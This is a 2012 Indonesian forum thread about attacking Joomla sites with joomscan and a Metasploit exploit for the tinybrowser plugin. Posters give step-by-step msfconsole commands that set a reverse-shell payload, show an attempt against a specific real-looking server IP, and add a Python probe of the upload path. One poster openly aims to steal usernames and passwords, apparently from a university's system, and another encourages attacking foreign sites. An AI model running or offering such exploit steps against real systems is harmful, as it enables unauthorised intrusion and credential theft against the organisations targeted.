ASK TENTANG JOOMSCAN.PL
#30
(03-28-2012, 10:17 PM)wine trochanter Wrote:
(03-28-2012, 05:49 PM)diampoleng Wrote:
(03-28-2012, 01:33 PM)wine trochanter Wrote:
(03-28-2012, 04:36 AM)diampoleng Wrote:
(03-28-2012, 01:09 AM)wine trochanter Wrote: hajarrrr aja dapatin pass n username semuanya,wkwkwkkw
ane lakukan ini buat pengetahuan dan kebaikan angkatan ku,soalnya apa kasihan kalo remed byar nya mahalllllllll terus mereka juga pelit,dan mempersulit para mahasiswanya #pengalaman ane Big Grin

FK unissula angkatan berapa om???

jiahhh ada syp,bhya ni
(03-25-2012, 08:13 PM)konspirasi Wrote:
(03-25-2012, 07:20 PM)fake666 Wrote: jelasin lagi dong om konspirasi..
langkah selanjutnya..kalo nemu vuln di tinybrowse ..

jalankan msfconsole, trus:
Code:
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST [MY IP ADDRESS]
msf exploit(joomla_tinybrowser) > set RHOST [TARGET IP]
msf exploit(joomla_tinybrowser) > exploit

ganti payload pake yg lain jg bisa, tergantung OS server sama aplikasi webnya

ayo dicoba, tapi jangan website dalam negeri ya Tongue

omm mau tanya ada tulisan gini knpa yah?
msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
php/bind_perl normal PHP Command Shell, Bind TCP (via perl)

msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf exploit(joomla_tinybrowser) > set RHOST 202.91.8.164
RHOST => 202.91.8.164
msf exploit(joomla_tinybrowser) > exploit

[*] Started reverse handler on 10.10.14.13:4444
[-] Error retrieving obfuscation code!
msf exploit(joomla_tinybrowser) >

Om, tinybrowser itu kan masuknya plugin..
Nah sekarang tinggal di analisis aja, kira2 ada rule2 tertentu ga'..
Siapa aja yang bisa mengakses plugin itu kalau bisa public ya bisa di exploit..
Atau mungkin settingan di joomlanya tidak default misal di url bukan defaultnya, kalau ini harus di tune lagi di metasploitnya..
Atau kalau tidak di exploit manual saja, tinggal ngikutin aja step dari coding yg ada di metasploitnya..

wkwkkwkw
sumpah ane bingung
hadehhh otak pas pasan nih

Kalau kita baca coding metasploitnya adalah :

URI = Joomla directory path (defaultnya di host:80) kalau misalkan letak web joomlanya tidak default maka harus di set dulu di option metasploit.
tinybrowserpath = '/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/'


# Get obfuscation code (needed to upload files)
karena saat akan melakukan exploit metasploit terlebih dahulu melakukan request untuk mendapatkan obfuscation code.

yaitu request "datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='"

Apabila statusnya "Successfully retrieved obfuscation code" maka akan dilanjutkan ke tahap selanjutnya ya itu uploading shell.

nah karena untuk case ini status "Error retrieving obfuscation code!" maka program stop sampai excute listing ini karena obfuscation code tidak berhasil di dapat. Dan tidak dilanjutkan ke tahap exploit.



Kenapa tidak mendapatkan obfuscation code??

Ok, kalau kita coba request path url plugin tiny browsernya kira2 apa responnya:

#python cekresponse.py

==================================================
#!/path/to/python
import httplib

httpServ = httplib.HTTPConnection("202.91.8.164", 80)
httpServ.connect()

httpServ.request('GET', "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php")

response = httpServ.getresponse()
printText (response.read())
===================================================


Respon saat kita coba request adalah "Restricted access"

Jadi dalam kata lain kita tidak di ijinkan untuk mengakses plugin tinybrowser.



Begitu penjelasannya kalau menurut saya.

Untuk teman-teman mohon dikoreksi apabila saya salah.


Messages In This Thread
ASK TENTANG JOOMSCAN.PL - by wine trochanter - 02-25-2012, 10:12 PM
RE: ASK TENTANG JOOMSCAN.PL - by geeky - 02-25-2012, 10:43 PM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 02-25-2012, 10:48 PM
RE: ASK TENTANG JOOMSCAN.PL - by geeky - 02-25-2012, 10:53 PM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 02-27-2012, 07:42 PM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 03-02-2012, 09:53 PM
RE: ASK TENTANG JOOMSCAN.PL - by geeky - 03-02-2012, 10:23 PM
RE: ASK TENTANG JOOMSCAN.PL - by THJC - 03-02-2012, 10:45 PM
RE: ASK TENTANG JOOMSCAN.PL - by iKONspirasi - 03-02-2012, 11:08 PM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 03-03-2012, 12:31 AM
RE: ASK TENTANG JOOMSCAN.PL - by THJC - 03-03-2012, 07:53 AM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 03-08-2012, 08:04 PM
RE: ASK TENTANG JOOMSCAN.PL - by tredz - 03-25-2012, 02:24 PM
RE: ASK TENTANG JOOMSCAN.PL - by ekawithoutyou - 03-25-2012, 05:49 PM
RE: ASK TENTANG JOOMSCAN.PL - by iKONspirasi - 03-25-2012, 07:17 PM
RE: ASK TENTANG JOOMSCAN.PL - by fake666 - 03-25-2012, 07:20 PM
RE: ASK TENTANG JOOMSCAN.PL - by iKONspirasi - 03-25-2012, 08:13 PM
RE: ASK TENTANG JOOMSCAN.PL - by fake666 - 03-25-2012, 09:25 PM
RE: ASK TENTANG JOOMSCAN.PL - by Junior Riau - 03-25-2012, 09:32 PM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 03-28-2012, 01:09 AM
RE: ASK TENTANG JOOMSCAN.PL - by diampoleng - 03-28-2012, 04:36 AM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 03-28-2012, 01:33 PM
RE: ASK TENTANG JOOMSCAN.PL - by ekawithoutyou - 03-28-2012, 01:56 PM
RE: ASK TENTANG JOOMSCAN.PL - by diampoleng - 03-28-2012, 05:49 PM
RE: ASK TENTANG JOOMSCAN.PL - by wine trochanter - 03-28-2012, 10:17 PM
RE: ASK TENTANG JOOMSCAN.PL - by diampoleng - 03-29-2012, 02:49 AM
RE: ASK TENTANG JOOMSCAN.PL - by fake666 - 03-28-2012, 11:39 PM
RE: ASK TENTANG JOOMSCAN.PL - by calon.sarjana - 03-28-2012, 02:27 AM
RE: ASK TENTANG JOOMSCAN.PL - by fake666 - 03-28-2012, 09:45 PM
RE: ASK TENTANG JOOMSCAN.PL - by Junior Riau - 03-28-2012, 09:54 PM
RE: ASK TENTANG JOOMSCAN.PL - by iKONspirasi - 03-29-2012, 02:52 AM
RE: ASK TENTANG JOOMSCAN.PL - by diampoleng - 03-29-2012, 03:24 AM




Users browsing this thread: 2 Guest(s)